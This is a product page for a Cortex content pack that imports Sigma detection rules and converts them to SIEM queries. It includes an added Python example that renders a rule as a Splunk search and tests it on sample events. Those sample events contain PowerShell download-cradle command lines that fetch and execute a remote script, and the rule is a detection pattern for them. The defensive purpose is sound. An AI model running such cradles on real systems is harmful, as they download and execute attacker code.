Sigma

This pack contains all the objects needed to import and manage Sigma rules within Cortex TIM.

Sigma

Overview

The Sigma Detection Rules content pack provides an integration with Sigma, a generic and open signature format for SIEM systems. This content pack enables you to create, manage, and use Sigma detection rules within Cortex TIM. Sigma rules describe relevant log events in a straightforward, vendor-neutral format that can be converted into SIEM-specific queries.

What does this pack do?

This pack enables you to import Sigma rules into Cortex TIM either as a string or from a file. Once a rule is in the system, you can use the built-in scripts to convert it into the query format of your choice and use the resulting query against third-party security products.
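As an added example (not code from the content pack or from SigmaHQ), the block below shows what the import-and-convert flow does underneath: it takes a constructed Sigma rule, renders it as a Splunk search string the way a Sigma backend would, and evaluates the same rule directly against three constructed process-creation events. The rule is written as the dict that yaml.safe_load() would return for the YAML file, so it runs without PyYAML. The rule content, field names and events are illustrative assumptions; the converter supports only the contains/startswith/endswith modifiers and and/or/not conditions over named selections, and raises on anything else rather than silently emitting a wrong query.

```python
"""Minimal Sigma rule -> Splunk query converter and event matcher (added example,
not pack or SigmaHQ code). Rule and events below are constructed for illustration."""
from __future__ import annotations

from typing import Any

MODIFIERS = {"contains", "startswith", "endswith"}

# Constructed rule, as yaml.safe_load() would return it. In YAML:
#   detection:
#     selection:
#       Image|endswith: '\powershell.exe'
#       CommandLine|contains: [DownloadString, Invoke-WebRequest]
#     filter:
#       User|startswith: 'NT AUTHORITY\'
#     condition: selection and not filter
RULE: dict[str, Any] = {
    "title": "Suspicious PowerShell Download Cradle",
    "logsource": {"product": "windows", "category": "process_creation"},
    "detection": {
        "selection": {
            "Image|endswith": "\\powershell.exe",
            "CommandLine|contains": ["DownloadString", "Invoke-WebRequest"],
        },
        "filter": {"User|startswith": "NT AUTHORITY\\"},
        "condition": "selection and not filter",
    },
}

# Constructed process-creation events; only the first should fire.
EVENTS: list[dict[str, str]] = [
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')",
     "User": "CORP\\alice"},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -c Invoke-WebRequest http://203.0.113.10/u.ps1",
     "User": "NT AUTHORITY\\SYSTEM"},  # matches selection, excluded by filter
    {"Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd /c whoami", "User": "CORP\\bob"},
]


def _field_and_modifier(key: str) -> tuple[str, str]:
    """'CommandLine|contains' -> ('CommandLine', 'contains'); a bare key means equality."""
    field, _, modifier = key.partition("|")
    if modifier and modifier not in MODIFIERS:
        raise ValueError(f"unsupported Sigma modifier {modifier!r} on field {field!r}")
    return field, modifier or "equals"


def _as_list(value: Any) -> list[Any]:
    return value if isinstance(value, list) else [value]


def _split_condition(condition: str) -> list[list[str]]:
    """'a and not b or c' -> [['a', 'not b'], ['c']]: OR of AND-clauses (Sigma precedence not > and > or)."""
    return [[t.strip() for t in clause.split(" and ")] for clause in condition.split(" or ")]


def _resolve(detection: dict[str, Any], token: str) -> tuple[bool, dict[str, Any]]:
    """Map a condition token to (negated, selection); reject grammar this example does not implement."""
    negated = token.startswith("not ")
    name = token[4:].strip() if negated else token
    if name == "condition" or name not in detection:
        raise ValueError(f"unsupported condition element {token!r} (only named selections with and/or/not)")
    return negated, detection[name]


def _splunk_term(field: str, modifier: str, value: Any) -> str:
    """One field test; modifiers become Splunk wildcards. Quote escaping is deliberately simplified."""
    v = str(value).replace('"', '\\"')
    pattern = {"equals": v, "contains": f"*{v}*", "startswith": f"{v}*", "endswith": f"*{v}"}[modifier]
    return f'{field}="{pattern}"'


def selection_to_splunk(selection: dict[str, Any]) -> str:
    """Fields in a selection are ANDed (Splunk implicit AND); a list value is an OR of alternatives."""
    parts = []
    for key, value in selection.items():
        field, modifier = _field_and_modifier(key)
        terms = [_splunk_term(field, modifier, v) for v in _as_list(value)]
        parts.append(terms[0] if len(terms) == 1 else "(" + " OR ".join(terms) + ")")
    return " ".join(parts)


def condition_to_splunk(detection: dict[str, Any]) -> str:
    """Render the whole detection block as one Splunk search expression."""
    clauses = []
    for clause in _split_condition(detection["condition"]):
        rendered = []
        for token in clause:
            negated, selection = _resolve(detection, token)
            rendered.append(("NOT " if negated else "") + "(" + selection_to_splunk(selection) + ")")
        clauses.append(" AND ".join(rendered))
    return " OR ".join(f"({c})" for c in clauses) if len(clauses) > 1 else clauses[0]


def _term_matches(event: dict[str, Any], field: str, modifier: str, value: Any) -> bool:
    """Sigma string matching is case-insensitive; a missing field never matches."""
    if field not in event:
        return False
    actual, expected = str(event[field]).lower(), str(value).lower()
    return {"equals": actual == expected, "contains": expected in actual,
            "startswith": actual.startswith(expected), "endswith": actual.endswith(expected)}[modifier]


def selection_matches(selection: dict[str, Any], event: dict[str, Any]) -> bool:
    return all(any(_term_matches(event, *_field_and_modifier(key), v) for v in _as_list(value))
               for key, value in selection.items())


def rule_matches(rule: dict[str, Any], event: dict[str, Any]) -> bool:
    detection = rule["detection"]

    def token_true(token: str) -> bool:
        negated, selection = _resolve(detection, token)
        return selection_matches(selection, event) != negated  # flip when negated

    return any(all(token_true(t) for t in clause) for clause in _split_condition(detection["condition"]))


def matching_events(rule: dict[str, Any], events: list[dict[str, Any]]) -> list[int]:
    """Indexes of the events the rule fires on."""
    return [i for i, e in enumerate(events) if rule_matches(rule, e)]


if __name__ == "__main__":
    print(condition_to_splunk(RULE["detection"]))
    print("fired on events:", matching_events(RULE, EVENTS))
```

Running it prints the Splunk search and reports that only event 0 fires: event 1 is a genuine download cradle but is carved out by the `filter` selection, and event 2 is not PowerShell at all. A production conversion (sigma-cli with a pySigma backend) additionally applies per-logsource field mappings, full escaping and the complete condition grammar (`1 of selection_*`, parentheses), which is why this example refuses such conditions instead of guessing.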

Content delivered with the content pack

  • An additional Cortex indicator type called "Sigma Rule".
  • All the relevant fields needed to store the data of the "Sigma Rule" indicator.
  • A new layout for the newly added indicator type.
  • Utility scripts to import Sigma rules and export them in the user-chosen query format.

Additional Information

For more information about Sigma and its uses, visit Sigma HQ.

PUBLISHER

PLATFORMS

Cortex XSOAR, Cortex XSIAM

INFO

Supported By: Cortex
Created: September 29, 2024
Last Release: October 10, 2024

DISCLAIMER
Content packs are licensed by the Publisher identified above and subject to the Publisher’s own licensing terms. Palo Alto Networks is not liable for and does not warrant or support any content pack produced by a third-party Publisher, whether or not such packs are designated as “Palo Alto Networks-certified” or otherwise. For more information, see the Marketplace documentation.